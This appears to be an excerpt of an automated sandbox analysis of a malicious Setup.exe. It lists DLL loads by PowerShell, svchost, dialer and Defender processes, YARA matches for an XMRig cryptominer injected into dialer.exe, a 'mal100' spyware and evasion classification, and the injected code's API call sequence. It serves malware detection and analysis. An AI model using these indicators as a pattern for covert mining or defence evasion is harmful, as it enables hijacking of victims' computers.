          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pcacli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engine Classification label: mal100.spyw.evad.mine.winZIP@108/24@1/6
          Source: C:\Windows\System32\dialer.exe Code function: 41_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 41_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe Code function: 41_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 41_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exe Code function: 41_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 41_2_000000014000226C
          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6916:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6840:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7008:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3976:120:WilError_03
